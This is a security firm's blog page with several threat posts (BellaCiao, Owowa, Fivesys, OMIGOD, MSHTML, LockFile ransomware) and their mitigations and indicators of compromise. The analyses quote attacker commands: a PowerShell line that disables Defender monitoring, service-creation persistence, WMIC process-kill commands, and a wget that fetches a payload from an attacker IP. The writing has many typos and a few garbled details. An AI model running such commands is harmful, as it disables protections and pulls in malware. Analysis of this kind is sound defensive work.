- Posted in Exploit by

BellaCiao is a the most current advanced trojan host that has come from the group APT35/42 otherwise known as Charming Kitten. This malicious code is made to be highly customizable to pinpoint specific targets, such as specific companies and even subdomains for payload delivery. The actual attack vector is microsoft exchange servers, but without advanced network IDS/IPS systems, BellaCiao could infiltrate your network without detection.

There is no currently known inital infection vector as there is yet to be any publicly stated logging of such. The ininrended target as used by the malwares authors is intended to be infrastructure or other valuble targets with higher than average security.

Upon deployment of the malware on an exchange server, it is currently designed to run the following in powershell.

powershell.exe -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true

It then currently starts malicious services in windows to maintain persistence such as:

sc create "Microsoft Exchange Services Health" binpath= "C:ProgramDataMicrosoftDRMSMicrosoft Exchange Services Health.exe" start= auto 

sc start "Microsoft Exchange Services Health"

sc create "Exchange Agent Diagnostic Services" binpath= "C:ProgramDataMicrosoftDiagnosticExchange Agent Diagnostic Services.exe" start= auto sc start "Microsoft Exchange Services Health"

Afterwards its recorded that the culprits then pushed malicious IIS modules to the affected server. one of which was IIS-Raid, an IIS module designed to act as a man in the middle for credential theft, sniffing for passwords in IIS traffic as per a list.

The second module was another custom made module design to exfiltrate the data found by the IIS-Raid module, it also captures and records HTTP requests with keywords “pass”, “pwd”, “password”, or “login” for exfiltration.

BellaCiao installs itself as a windows service executable to prevent detection by users, and as it is a trojan host and a C2 module, its functions are baked in, and it could also carry a payload within, making it even more unpredictable and dangerous. It sends BNS requests every 24hrs to maintain isn't connection to the internet and the attacker. These DNS requests are sent to a DNS server that the attacker has control of, and the response from the server is how the the commands are sent to act. the last octet in the returned IP determines the actions to take, as per the pre-programmed IPs baked into the code.

Functions possible by this method include:

Command execution
Execute script Download file
Upload file
Upload web logs
Report web server start time
Report current time
Stop web server


Our assessment of this type of attack is that more high level and automated tools such as modern IDS/IPS, are needed for an in-depth strategy to monitor network traffic and prevent breaches. This malware platform is attacking exchange servers today, but can likely be rebuilt to attack other types of network resources. Combine that with that it can also infiltrate payloads into a network stealthily means it could possibly wreak more havoc than described in this article today. If you aren't sure if your network security is up to task consult a well known trusted firm to get an assessment of your organization security and have proper polices in place.

Owowa: A malicious IIS module for data theft.

- Posted in Vulnerability by

Owowa is an Microsoft web server (IIS) module currently tuned to intercept outlook web app (OWA) login requests. The exact method of how Owowa makes its way onto servers isn't yet fully known as of publishing of this post, but it is possible that it is deployed as a reconnaissance tool/sniffer during an initial attack on a network. Once it is deployed to a server it is designed to intercept login requests to the target outlook web instance and to funnel the login credentials found to whomever deployed it. This means that if your exchange server is infected, just logging into outlook to check your email can comprise your email account, give the attacker direct control of your email account, and lead to phishing campaigns by pretending to be you. Currently, Owowas targeted have reportedly been governments or government controlled entities in the asia pacific region, but that can change at any time.

Owowa currently works by monitoring HTTP requests on the infected server and responses for OWA traffic by triggering the “PreSendRequestContent” flag, this flag is suspected to be only triggered when a web application hosted by IIS is about to send content to a client application, such as an outlook client. It also verifies that the login was successful by grabbing data from authentication tokens sent as a access confirmation back to the client which contains the user login credentials, IP address and timestamp. It is suspected that the attacker can enter certain strings into the owa login pages username field on an infected server to retrieve the servers credentials log, delete said log, or use the owa login page password field to remotely execute powershell commands remotely.

The IIS "IHttpModule" is used for packet sniffing. According to Microsoft, using the string with the associated flag triggered within the IHttpModule is not recommended as it can lead to server instability/crashes. MS warning The attacker, however, is using this exploit to retrieve information despite Microsoft considering that this is not how it should be used.

Another part of the danger regarding Owowa is that without having a security regime tuned to looking for the type of traffic that Owowa sends the only real way to determine if Owowa is on your server is a manual investigation of the loaded modules in IIS. We are informed that most/all security platforms are not designed to search for vulnerabilities like Owaowa at the time of this post.

Currently talk about Owowa is just that, talk; even Kaspersky researchers, who first discovered Owowa and made its existence public, have not yet taken any protective action. In addition, there is no current discussion as to what Owaowa can be turned into, since it is a snooping tool for IIS currently tuned to steal exchange credentials, modifications to its programming likely would, and could allow it to grab any sort of data being sent to/from an IIS server. Such a vulnerability could mean that the entire IIS ecosystem is a continuous threat risk.

Part of my concern around Owowa and about how dangerous it can be, is that it has been reported that Owowa has unused empty modules within its code that could be potentially - maybe already have been - could be used to enhance its current capability.


Owowa may not yet be commonplace but the threat is significant enough that immediate action should be taken. Verification of the IIS backend, its configuration, on a regular basis. Checks should be done regularly to look for the module and remove it. It is thought that Owowa is currently a reconnaissance tool for an ongoing attack, post exploit, or information grabber for the dark web that will lead to additional exploits, phishing and scams. So proactive steps need to be implemented to assist in preventing the exploit.

Fivesys rootkit exploits Microsoft certification system

- Posted in Exploit by

Fivesys is a rootkit that has been recently discovered in the wild. A rootkit is a type of malware designed to install in the background on a target machine and are also designed to be hard to impossible to detect by normal malware scanning and remediation processes. Rootkits as a class of malware isn't new, but the viability of rootkits overall, has been reduced due to countermeasures developed to mitigate the vast majority of rootkits on the internet. The difference with this rootkit is its packaging that mimics a valid signed driver; it even has a Microsoft signed certificate.

The purpose of the Fivesys rootkit to date, is to redirect HTTP/HTTPS traffic to an attackers predefined IP addresses. The current package has a list of 300 different IPs through proxy designed to prevent blocking traffic. The package also contains a driver blacklist to prevent it being removed or overwritten with a legitimate package. It is it thought by Bitdefender, the company that made the discovery, that the primary target of Fivesys is online games, with the intent to steal game login credentials and hijack in-game transactions for payment credentials/data. As the prior statement cannot be fully verified at this time, we would like to note that re-programming of the package will likely occur resulting in Fivesys being weaponized for any number of similar attack vectors.

As I outline in my first paragraph, the major issue with Fivesys is that the creator has managed to pass the package through Microsoft's driver validation program, which we have confirmed is a fully automated signing process with no manual oversight or flag for review. This allows an actor to use the process to bypasses all of the inbuilt windows security features, leaving machines vulnerable until it is discovered.


Our recommendation to prevent Fivesys or any other rootkits from affecting your environment is to be diligent in your downloads by confirming you are on the manufacturers site. Input the url to the manufacturer manually, do not click on links, and do not use the google search to click a link to go to the download. Current exploits in AdSense and other links, advertising links to legitimate sites that are user uploaded sources, all pose a real risk to Fivesys being downloaded instead of the legitimate driver/software you are after - see our posts on the AdSense exploit. Make sure all your teams, staff and users are trained on cyber security.

OMIGOD Flaw in Azure on Linux Persists Despite Microsoft Fixes

- Posted in Uncategorized by

Cybercriminals are targeting Linux-based servers running Microsoft’s Azure public cloud environment that are vulnerable to flaws after Microsoft didn’t automatically apply a patch on affected clients in its infrastructure.

Recorded Future reports that the attacks began the night of Sept. 16 after a exploit proof-of-concept was published on GitHub. It was noted that about 10 malicious bot servers have been searching the internet for vulnerable systems. In addition, Cado Security researchers in a blog post also noted a tweet from cybersecurity researcher German Fernandez, who found that the infamous DDoS Mirai botnet – known for taking advantage of insecure Internet of Things (IoT) devices – also is exploiting OMIGOD.

The flaws include CVE-2021-38647, which is a remote code execution bug, and three privileged escalation vulnerabilities: CVE-2021-8648, CVE-2021-38645 and CVE-2021-38649. Ohfeld wrote that the researchers offered a conservative estimate that thousands of Azure customers and millions of endpoints are impacted by the flaws.

“Supply chain cyber attacks have disrupted everyday life and dominated headlines this year,” he wrote. “One of the biggest challenges in preventing them is that our digital supply chain is not transparent. If you don’t know what’s hidden in the services and products you use every day, how can you manage the risk?”

OMIGOD Microsoft

Microsoft was quick to issue fixes to the four vulnerabilities in its September release of security updates, and the vulnerabilities put a spotlight on the risk to supply chains that Microsoft open-source code represents, particularly for organizations using cloud computing services since Microsoft let go its Beta testing teams and community Beta testers that used to volunteer their time.

With OMIGOD, the issue relates to the app called Open Management Infrastructure (OMI), which is embedded in many Azure services and is sponsored by Microsoft open-source OMI project in collaboration with The Open Group.

When users enable any of these popular services, OMI is silently installed on their Virtual Machine by Azure, running at the highest privileges possible. This happens without customers’ explicit consent or knowledge. Users simply click agree to log collection during setup and they have unknowingly opted in to the Microsoft application. Because Azure provides virtually no public documentation about OMI, most customers have never heard of it and are unaware that this attack surface exists in their environment.

The OMI agent operates as root (the highest privileges any users can have) and with it using a Unix socket or through an HTTP API has unlimited control. In Linux, and Unix based environments, the use of Root for any application is discouraged, and this should be the Microsoft default as well, especially when the app is exposed to internet access, but it is not the case as OMI shows. With OMI being so poorly implemented bad actors can easily gain control of the servers.

“This vulnerability can be also used by attackers to obtain initial access to a target Azure environment and then move laterally within it,” Ohfeld wrote in a technical blog. Thus, an exposed port with such access privilege's is a holy grail for malicious attackers, and with OMI, one simple exploit provides attackers with access to new targets, execute commands at the highest privileges, and possibly spread exponentially to new target machines.

Recorded Future noted that Microsoft addressed the bug by developing version of the OMI client and releasing it on GitHub, but didn’t automatically install the update on OMI clients in its infrastructure, essentially leaving tens of thousands of servers vulnerable. The company also took three days to replace the OMI client version inside its available Azure Linux VM images.

The cybersecurity firm said a query on the Shodan search engine found more than 15,600 Azure Linux servers connected to the internet, all with possible exposure, and these are just the ones known.


  1. Immediately implementing the OMI patch.
  2. Remove it if it is unneeded
  3. Check and confirm all applications exposed to the internet
  4. Scan and check all server files, access controls, ports and privilege's as well as check your user accounts and groups.

Office 365/2019 MSHTML Vulnerability

- Posted in Vulnerability by

An organization named EXPMON discovered an Office 365/2019 vulnerability on September 5th 2021. The vulnerability lies within MSHTML, which is the Microsoft Internet Explorer browser engine. The vulnerability itself is a Remote code execution (RCE) attack, allowing the attacker to remotely install malware on the target machine.

Source tweet Source tweet

The exploit is performed by an attacker sending a user a modified .docx file. Said file will contain a script upon opening the document that will use the IE MSHTML engine to open the url programmed into the scripting in the .docx file.

Microsoft has recommended disabling scripts and active X execution, but we are not convinced this is enough due to the base IE11 code being left in the OS. Despite Microsoft not carrying over the IE coding from legacy Edge when they switched to the new Chromium based Edge browser, having legacy IE11 code within the OS still makes execution possible and we recommend removing the base IE11. This is, however, not a guarantee as Microsoft has not confirmed if the IE11 code exist in other parts of the OS, so the following prevention recommendations should always be followed:

Recommendation Internet Explorer 11, even if not showing on your computer, is likely still installed as a background app on your machine as Microsoft has maintained it for compatibility, it is recommended to remove it. You can do this by searching for windows features in the windows search bar. Uncheck the Internet Explorer 11 checkbox to remove "Internet Explorer" and IE11 code. Your PC should request a reboot, click reboot when prompted.

See walkthrough video here

If your business still requires use of Internet Explorer 11 for any reason, contact the developer of the program you are using to ask them to update their codebase to support modern web browsing.

It is important to remember that attachments are often insecure, and even if you have removed the above code, we continue to recommend not opening attachments unless you are absolutely sure of the source; and even then, only once you have confirmed that the source did send it.

The preferred approach is to use a sharing system such as our On The move server available to all types of business, as one example; or other secure option instead of using attachments.

LockFile Ransomware: Exploiting Microsoft Exchange Vulnerabilities Using ProxyShell

- Posted in Ransomware by

​​LockFile ransomware was first seen in July 2021 and has been highly active since then. It has global operations, and most of the victims are from the United States of America and Asia. The ransomware group hosts a website in the TOR network to guide victims to pay the ransom and subsequently get the instructions to decrypt the files. This webpage contains a uTox ID and an email address to contact the Threat Actor (TA), as shown in the figure below.

Darkweb Lockfile

Cyble Researchers found that a few details indicate that the ransomware gang could also be related to the other threat actors from the ransomware website. For example, as mentioned in the ATTENTION section of the website, the last line mentions a wallpaper being provided by lockbit, and the contact email contains a reference to Conti.

​Recently the Threat Actor (TA) behind LockFile has started attacking Microsoft Exchange Servers using ProxyShell attack. The ProxyShell attack uses chained Microsoft Exchange vulnerabilities mentioned in the list below, resulting in unauthenticated code execution. Orange Tsai, a Principal Security Researcher from Devcore, recently discovered these vulnerabilities. Following is the list of vulnerabilities. ​

  • ​CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (Patched in April by KB5001779)
  • ​CVE-2021-34523 - Elevation of Privilege on Exchange PowerShell Backend (Patched in April by KB5001779)
  • CVE-2021-31207 - Post-auth Arbitrary-File-Write leads to RCE (Patched in May by KB5003435) ​

​According to a Symantec blog post, after successful exploitation, the TA uses the PowerShell command. ​

powershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH

​The PowerShell command in use is unknown, but on August 13, 2021, an independent security researcher captured the associated IP address (209.14.0[.]234). According to the researcher, attackers used this IP to exploit ProxyShell Vulnerability.

Researchers also found that 20 to 30 minutes before the deployment of ransomware, the TA drops three files:

​An Exploit for PetitPotam vulnerability (CVE-2021-36942), namely efspotato.exe.

​Two files: active_desktop_render.dll and active_desktop_launcher.exe

​PetitPotam vulnerability allows the TA to compromise Domain Controller, which results in the compromise of the complete Active Directory. The PetitPotam technique uses MS-EFSRPC (Microsoft’s Encrypting File System Remote Protocol), Which is responsible for performing maintenance and management operations on the encrypted data stored on the remote system.

​As per Symantec, the executable active_desktop_launcher.exe is legitimate software, but active_desktop_render.dll is a malicious Dynamic Link Library (DLL). The active_desktop_render.dll is loaded using the DLL Search Order Hijacking attack. After loading, the DLL file drops and decrypts desktop.ini in a local directory. This desktop.ini then loads and executes shellcode, which then activates the efspotato.exe file that is exploited for the PetitPotam vulnerability.

​​Upon compromising the domain, the TA then deploys LockFile ransomware in various systems of the compromised domain.

​​Cyble Research found one of the LockFile malware samples from the surface web while conducting routine Open-Source Intelligence (OSINT) threat hunting exercises. The figure below shows the high-level execution flow of LockFile Ransomware. The malware initially kills all the known processes related to virtual machines, databases, and other related services. Then, it iterates through drives into the system to find the logical drive to search for files and folders. After the files are found, the malware checks the extensions of the file, and if matched to the pre-defined file extension, the ransomware encrypts it. After completing the encryption process, it deletes itself.

Exchange execution

Technical Analysis ​​Their static analysis found that the malware is a Windows-based x64 architecture Console application written in C/C++ and compiled on 2021-07-03 18:15:34, as shown in the figure below.

Details of static analysis

​As shown in the figure below, the malware creates several subprocesses to perform several activities upon execution.

Details of malware execution

The subprocess kills various running processes shown in Table 1. The malware uses the Windows Management Interface Command (WMIC) command and provides the process name as a wild card in between %% to achieve this task. WMIC is a simple command prompt tool that returns information about the system you are running it on.

The list of commands which the malware has executed is shown in table below.

Command Target Process 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%vmwp%'” call terminate vmwp 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%virtualbox%'” call terminate virtualbox 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%vbox%'” call terminate vbox 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%sqlservr%'” call terminate sqlservr 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%mysqld%'” call terminate mysqld 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%omtsreco%'” call terminate omtsreco 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%oracle%'” call terminate oracle 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%tnslsnr%'” call terminate tnslsnr 
C:Windowssystem32cmd.exe /c wmic process where “name  like ‘%vmware%'” call terminate vmware 

Table 1 WMIC Commands executed by Ransomware to Kill Processes

Once the ransomware kills all the processes, it iterates through the victim’s machine and encrypts the user document files and appends extensions with .lockfile, as shown in the figure below.

Appended extensions

Figure 5: Files encrypted by LockFile

Once the files are encrypted, the malware launches an HTML Application file (HTA) to show the ransom message to the user, as shown in the figure below, and then deletes itself. ​

Ransomware message

Figure 6: Ransom Message Created by LockFile

Code Analysis And Debugging The figure below shows that the malware calls a series of WMIC commands to kill various processes upon debugging. The list of commands is shown in Table 1.

WMIC commands

Figure 7: WMIC commands used by LockFile ransomware to kill processes Once the ransomware kills all the defined processes, it extracts the ransom note content from the executable, as shown below.

Ransom note

Figure 8: Ransom Note Extracted from LockFile Ransomware in Memory Afterward, the malware gets the list of drives using the GetLogicalDriveStringsA Application Programming Interface (API). Finally, the list of drives is passed one at a time to GetDriveTypeA API, after which the result compares with 03 (DRIVE_FIXED), which indicates whether the found drive is fixed media, e.g., Logical Drives as shown below. Once the drive is located, the malware creates a thread to conduct further ransomware activity. ​

Fixed media checked

Figure 9: Fixed Media checked by LockFile

The malware thread creates LOCKFILE-README.hta in the root, as shown in the figure below.

Thread creating

Figure 10: LockFile’s Thread creating LOCKFILE-README.hta in C:/

Then the ransomware starts iterating through the files and folder. The code passes whatever files/folders are found through a series of checks. The checks are mentioned below list.

1 – desktop.ini string is not present in the filename

2 – Windows is not present in the full path

3 – LOCKFILE string is not present in the filename

4 – NTUSER string is not present in the filename

The checks are shown in the below code.

checks performed

Figure 11: Checks performed by LockFile.

Once all the checks are passed, the malware compares the files extension with a pre-defined extension embedded in the malware. The code is shown in the figure below.


Figure 12: File Extension Compared by LockFile

For example, in the below figure, we can see that the malware is comparing 36897c.rbf extension with .1cd extension.

file extensions

Figure 13 Ransomware Check File Extension

Similarly, the malware compares all extensions, shown in Table 2, with the victim’s file. This activity helps us conclude that the malware is targeting only a specific extension file.

.lcd .7z .7zip .acccdb .ai .asp .aspx .backup .bak .cd .cdr .cdx .cer .cf .cfl .cfu .config .cs .csv .dat .db .dbf .doc .docx .dt .dwg .edb .efd .elf .epf .erf .fpt .geo .grs .html .ibd .jpeg .ldf .lgf .lgp .log .mdb .mdf .mft .mp3 .mxl .myd .odt .pdf .pff .php .ppt .pptx .ps1 .psd .pst .rar .sln .sql .sqlite .st .tiff .txt .vdi .vhd .vhdx .vmdk .vrp .wdb .xls .xlsx .zip

Table 2 List of File Extensions which are targeted by ransomware

As shown below in figure 14, once the file is found with the defined extension, the malware reads the plain text content from the file.

read plain text

Figure 14 Read Plain Text content from Victim’s File

It then calls another user-defined function for encrypting the content using Advanced Encryption Standard (AES), as shown below.

call encryption

Figure 15 Call Encryption Function to encrypt the content

Once the content is encrypted, the malware writes it into the file, and then it appends the encrypted file with extension .lockfile using MoveFileA API, as shown in the below figure.


Figure 16 Append .lockfile extension to the user document file

The same activity is shown below in figure 17.

extension to user file

Figure 17 Append .lockfile extension to the user document file while debugging

Once all the files have been encrypted, the malware creates a ransom note .hta file in the C:UsersPublic directory, as shown in the figure below.


Figure 18 Creates .HTA ransom file C:UsersPublic

Once the .hta ransom file is created, it calls CreateProcess API to launch the .hta file using mshta.exe windows utility. The mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files.

mshta exe

Figure 19 Launch.HTA ransom File using mshta.exe

Finally, once all the files are encrypted, the malware deletes itself by calling the del command, as shown below.

del command

Figure 20 Use Del command to delete itself


The threat actors behind the LockFile exploit publicly disclosed vulnerabilities in sequence to attack Microsoft Exchange Server and then use PetitPotam vulnerability to compromise the Domain Controller. After achieving these two objectives, the TA drops the LockFile ransomware into the systems.

Based on the ransom notes, Cyble Research Labs speculate that the TA may be creating unique custom variants of the LockFile ransomware for each victim organization.

Cyble Research Labs continuously monitors the LockFile ransomware activity; we will continue to update our readers with our latest findings.


Cyble Research labs have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the suggestions given below: 

  • Use a reputed anti-virus and internet security software package on your connected devices.     
  • Conduct regular backup practices and keep those backups offline or in a separate network. 
  • Refrain from opening untrusted links and email attachments without verifying their authenticity. 
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.  
  • Use strong passwords and enforce multi-factor authentication wherever possible. 

MITRE ATT&CK® Techniques

Tactic Technique ID Technique Name 
Reconnaissance T1595.002 T1591 T1593 Active Scanning Gather Victim Org Information Search Open Websites/Domains 
Initial Access T1190 Exploit Public-Facing Application 
Execution T1059.001 Command and Scripting Interpreter: PowerShell 
Defense Evasion T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 
Lateral Movement T1210 Exploitation of Remote Services 
Impact T1486 Data Encrypted for Impact 

Indicators of Compromise (IoCs):   

Indicators Indicator type Description 
354a362811b8917bd7245cdd43fe12de9ca3f5f6afe5a2ec97eec81c400a4101 SHA256 LockFile Ransomware 
ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 SHA256 Malicious DLL 
36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 SHA256 Driver file 
5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f SHA256 Malicious executable 
1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 SHA256 Malicious DLL 
7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd SHA256 PetitPotam exploit 
bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce SHA256 LockFile executable 
209.14.0[.]234 IP address Attacher’s IP